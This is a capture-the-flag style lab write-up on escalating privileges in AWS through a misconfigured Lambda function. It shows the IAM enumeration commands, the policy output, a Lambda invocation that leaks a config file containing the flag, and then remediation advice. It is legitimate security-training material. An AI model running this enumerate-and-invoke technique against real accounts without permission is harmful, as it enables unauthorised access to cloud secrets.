Lambda Escalation Walkthrough

Welcome to Secure Corp’s red team mission! Your assignment, should you choose to accept it, is to infiltrate the cloud environment and assess potential IAM misconfigurations. Your target? Lambda Functions - where hidden permissions might allow you to escalate privileges and retrieve sensitive data.

Secure Corp has implemented IAM users, roles, and policies to protect its infrastructure. However, recent security audits have flagged potential vulnerabilities in role assignments and Lambda function execution. Your job is to simulate an attack, identify gaps, and capture the hidden flag concealed in the cloud.

Initial Access:

The participant is provided with the credentials of one of the employee.

AWS Resources:

Organization has Users, Roles and Policies to manage the workflow, Buckets, Lambda Function.

Hidden Flag:

The flag is hidden in one of the resources.

Your Task:

Enumerate AWS IAM resources (users, roles, policies, and attached permissions).
Analyze Lambda function permissions and exploit any misconfigurations.
Invoke Lambda functions to escalate privileges and retrieve the flag hidden in the system.

Attack Flow

AWS-Lambda-01

1. Initial Access & Enumeration

1.1 Initial Access Credentials

Access Key ID:[REDACTED_ACCESS_KEY]
Secret Access Key:[REDACTED_SECRET_KEY]

Configure AWS credentials

> $ aws configure --profile lambda
AWS Access Key ID [None]: [REDACTED_ACCESS_KEY]
AWS Secret Access Key [None]: [REDACTED_SECRET_KEY]
us-east-1egion name [us-east-1]: us-east-1
Default output format [json]: json

whoami Output:

> $ aws sts get-caller-identity --profile lambda
{
    "UserId": "AIDAQ3EGUZMEQI6PURZBE",
    "Account": "058264439561",
    "Arn": "arn:aws:iam::058264439561:user/developer1"
}

Username: developer1

1.2 IAM Enumeration

List managed user policies for developer1

> $ aws iam list-attached-user-policies --profile lambda --user-name developer1
{
    "AttachedPolicies": [
        {
            "PolicyName": "ListUserPoliciesPolicy",
            "PolicyArn": "arn:aws:iam::058264439561:policy/ListUserPoliciesPolicy"
        },
        {
            "PolicyName": "LambdaInvokePolicy",
            "PolicyArn": "arn:aws:iam::058264439561:policy/LambdaInvokePolicy"
        }
    ]
}

Two managed policies are attached to developer1 - let’s check their permissions.

Retrieve the managed policy ListUserPoliciesPolicy

> $ aws iam get-policy --policy-arn arn:aws:iam::058264439561:policy/ListUserPoliciesPolicy --profile lambda
{
    "Policy": {
        "PolicyName": "ListUserPoliciesPolicy",
        "PolicyId": "ANPAQ3EGUZME6K77LHU2K",
        "Arn": "arn:aws:iam::058264439561:policy/ListUserPoliciesPolicy",
        "Path": "/",
        "DefaultVersionId": "v1",
        "AttachmentCount": 1,
        "PermissionsBoundaryUsageCount": 0,
        "IsAttachable": true,
        "Description": "Allow user to list and get their own IAM policies",
        "CreateDate": "2024-11-04T09:48:12+00:00",
        "UpdateDate": "2024-11-04T09:48:12+00:00",
        "Tags": []
    }
}

Description states the user can : “Allow user to list and get their own IAM policies” lets confirm the permission by checking permission assigned to the policies”

Check the permissions assigned to ListUserPoliciesPolicy

{
    "PolicyVersion": {
        "Document": {
            "Statement": [
                {
                    "Action": [
                        "iam:ListAttachedUserPolicies"
                    ],
                    "Effect": "Allow",
                    "Resource": "arn:aws:iam::058264439561:user/developer1"
                },
                {
                    "Action": [
                        "s3:ListAllMyBuckets"
                    ],
                    "Effect": "Allow",
                    "Resource": "*"
                }
            ],
            "Version": "2012-10-17"
        },
        "VersionId": "v1",
        "IsDefaultVersion": true,
        "CreateDate": "2024-11-04T09:48:12+00:00"
    }
}

Found S3 permission to list any S3 bucket and list attached policies for the developer1 user and again lets check with the LambdaInvokePolicy

Retrieve the Managed Policy for LambdaInvokePolicy

> $ aws iam get-policy --policy-arn arn:aws:iam::058264439561:policy/LambdaInvokePolicy --profile lambda
{
    "Policy": {
        "PolicyName": "LambdaInvokePolicy",
        "PolicyId": "ANPAQ3EGUZME4QXYT3FWQ",
        "Arn": "arn:aws:iam::058264439561:policy/LambdaInvokePolicy",
        "Path": "/",
        "DefaultVersionId": "v1",
        "AttachmentCount": 1,
        "PermissionsBoundaryUsageCount": 0,
        "IsAttachable": true,
        "CreateDate": "2024-11-04T09:48:37+00:00",
        "UpdateDate": "2024-11-04T09:48:37+00:00",
        "Tags": []
    }
}

Check the permissions assigned to LambdaInvokePolicy

> $ aws iam get-policy-version --policy-arn arn:aws:iam::058264439561:policy/LambdaInvokePolicy  --version-id v1 --profile lambda
{
    "PolicyVersion": {
        "Document": {
            "Statement": [
                {
                    "Action": [
                        "lambda:InvokeFunction",
                        "iam:GetUserPolicy",
                        "iam:GetPolicyVersion",
                        "iam:GetPolicy"
                    ],
                    "Effect": "Allow",
                    "Resource": [
                        "arn:aws:lambda:us-east-1:058264439561:function:Bucket-mgmgt-Function",
                        "arn:aws:iam::058264439561:policy/ListUserPoliciesPolicy",
                        "arn:aws:iam::058264439561:policy/LambdaInvokePolicy"
                    ]
                }
            ],
            "Version": "2012-10-17"
        },
        "VersionId": "v1",
        "IsDefaultVersion": true,
        "CreateDate": "2024-11-04T09:48:37+00:00"
    }
}

The developer1 user can invoke a function and retrieve policy and permissions for managed policies - which we’ve already done.
Interestingly, we can perform invoke action for the Bucket-mgmgt-Function - let’s try it.

2. Abusing Misconfiguration

Invoking the Lambda function using misconfigured permissions

> $ aws lambda invoke --function-name Bucket-mgmgt-Function output.json --region us-east-1 --profile lambda
{
    "StatusCode": 200,
    "ExecutedVersion": "$LATEST"
}

> $ cat output.json| jq
{
    "statusCode": 200,
    "body": "\"[default]\\r\\nregion = us-east-1\\r\\noutput = json\\r\\n\\r\\n[profile dev]\\r\\nregion = us-west-2\\r\\noutput = json\\r\\n# This is the dev profile for AWS access.\\r\\n# [REDACTED_FLAG]\\r\\n\\r\\n[profile test]\\r\\nregion = eu-west-1\\r\\noutput = text\\r\\n# This is the test profile for testing environment configurations.\\r\\n\\r\\n[profile prod]\\r\\nregion = ap-southeast-1\\r\\noutput = json\\r\\n# This is the production profile for AWS access. Make sure to use with caution.\\r\\n\""
}

Flag found: [REDACTED_FLAG]

Note: We had permissions to list the S3 bucket, but we didn’t use it. Instead, we exploited an existing misconfiguration in the Lambda function to escalate privileges and retrieve the flag. This lab is rated as medium difficulty in CWL, but it’s actually an easy one.

3. Key Takeaways

IAM Misconfigurations Can Lead to Escalation: Weak role and policy assignments can expose critical resources.
Lambda Functions Can Be Exploited: Misconfigured invocation permissions can provide access to restricted data.
Enumeration is Key: Identifying policies, roles, and permissions is essential for privilege escalation.
AWS CLI is Your Best Friend: Mastering AWS CLI commands is critical for cloud security assessments.

4. Remediation Steps

Restrict Lambda invocation so only trusted roles can execute the function.
Remove unnecessary IAM permissions and enforce strict least-privilege for all users.
Ensure Lambda functions never return sensitive data and store secrets securely.
Enable CloudTrail and monitoring alerts to detect suspicious IAM or Lambda activity.